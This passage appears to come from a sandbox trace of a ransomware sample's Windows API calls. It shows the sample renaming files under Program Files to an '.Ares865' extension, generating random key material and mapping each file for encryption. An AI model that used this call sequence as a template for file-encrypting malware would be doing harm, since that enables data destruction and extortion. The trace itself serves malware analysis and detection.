pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.391] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0054.391] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0054.434] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml.Ares865") returned 82 [0054.435] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\gadget.xml"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\gadget.xml.ares865"), dwFlags=0x1) returned 1 [0054.501] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\gadget.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0054.501] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=993) returned 1 [0054.501] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0054.502] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0054.502] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0054.502] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0054.502] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.502] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0054.503] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f0, lpName=0x0) returned 0x12c [0054.504] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f0) returned 0x190000 [0054.547] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0054.548] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.548] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0054.548] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0054.575] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml.Ares865") returned 84 [0054.575] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\gadget.xml"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\gadget.xml.ares865"), dwFlags=0x1) returned 1 [0054.576] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\gadget.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0054.577] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1003) returned 1 [0054.577] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0054.577] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f78 [0054.577] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0054.577] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0054.578] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.578] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0054.578] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f0, lpName=0x0) returned 0x12c [0054.580] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f0) returned 0x190000 [0054.581] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0054.582] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.582] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0054.582] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d36d8 [0054.603] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.Ares865") returned 87 [0054.603] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\gadget.xml"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\gadget.xml.ares865"), dwFlags=0x1) returned 1 [0054.605] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\gadget.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0054.605] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1010) returned 1 [0054.605] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0054.605] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0054.605] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0054.605] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0054.606] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.606] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.606] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x12c [0054.608] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x190000 [0054.609] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0054.610] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.610] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0054.731] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\avtransport.xml.Ares865") returned 82 [0054.731] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\avtransport.xml" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\avtransport.xml"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\avtransport.xml.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\avtransport.xml.ares865"), dwFlags=0x1) returned 1 [0054.733] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\avtransport.xml.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\avtransport.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0054.733] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=19842) returned 1 [0054.733] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0054.734] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f50 [0054.734] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0054.734] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0054.735] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.735] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.735] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5090, lpName=0x0) returned 0x120 [0054.737] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5090) returned 0x190000 [0054.739] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0054.740] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.740] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.740] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5fc8 [0054.741] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.Ares865") returned 92 [0054.741] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\connectionmanager_dmr.xml"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\connectionmanager_dmr.xml.ares865"), dwFlags=0x1) returned 1 [0054.741] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\connectionmanager_dmr.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0054.741] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=5375) returned 1 [0054.741] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0054.742] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f50 [0054.742] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0054.742] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0054.743] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.743] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.743] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1800, lpName=0x0) returned 0x120 [0054.744] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1800) returned 0x190000 [0054.745] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0054.746] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.746] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.746] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5fc8 [0054.747] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\RenderingControl.xml.Ares865") returned 87 [0054.747] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\RenderingControl.xml" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\renderingcontrol.xml"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\RenderingControl.xml.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\renderingcontrol.xml.ares865"), dwFlags=0x1) returned 1 [0054.751] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\RenderingControl.xml.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\renderingcontrol.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0054.751] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=6363) returned 1 [0054.751] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0054.751] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f50 [0054.751] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0054.751] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0054.752] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.752] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.752] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1be0, lpName=0x0) returned 0x120 [0054.754] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1be0) returned 0x190000 [0054.755] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0054.756] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.756] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.756] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5fc8 [0054.803] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\Client.xml.Ares865") returned 98 [0054.803] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\Client.xml" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\subsetlist\\client.xml"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\Client.xml.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\subsetlist\\client.xml.ares865"), dwFlags=0x1) returned 1 [0054.804] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\Client.xml.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\subsetlist\\client.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0054.804] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3446) returned 1 [0054.804] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0054.805] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f88 [0054.805] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0054.805] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0054.805] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.805] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.806] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1080, lpName=0x0) returned 0x120 [0054.808] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1080) returned 0x190000 [0054.809] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0054.810] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.810] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6000 [0054.815] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml.Ares865") returned 105 [0054.815] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\frameworklist.xml"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\frameworklist.xml.ares865"), dwFlags=0x1) returned 1 [0054.816] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\frameworklist.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0054.816] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=12192) returned 1 [0054.816] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0054.816] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0054.816] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0054.816] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0054.817] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.817] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.817] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x32a0, lpName=0x0) returned 0x120 [0054.819] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x32a0) returned 0x190000 [0054.820] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0054.821] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.821] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.821] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0054.827] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml.Ares865") returned 90 [0054.827] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\winfxlist.xml"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\winfxlist.xml.ares865"), dwFlags=0x1) returned 1 [0054.828] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\winfxlist.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0054.828] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2578) returned 1 [0054.828] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0054.829] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f88 [0054.829] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0054.829] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0054.830] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.830] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.830] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd20, lpName=0x0) returned 0x120 [0054.831] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd20) returned 0x190000 [0054.832] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0054.832] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.833] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.833] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6000 [0054.836] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\Client.xml.Ares865") returned 98 [0054.836] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\Client.xml" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\subsetlist\\client.xml"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\Client.xml.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\subsetlist\\client.xml.ares865"), dwFlags=0x1) returned 1 [0054.837] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\Client.xml.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\subsetlist\\client.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0054.837] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3495) returned 1 [0054.837] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0054.837] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0054.837] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0054.837] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0054.838] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.838] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.838] 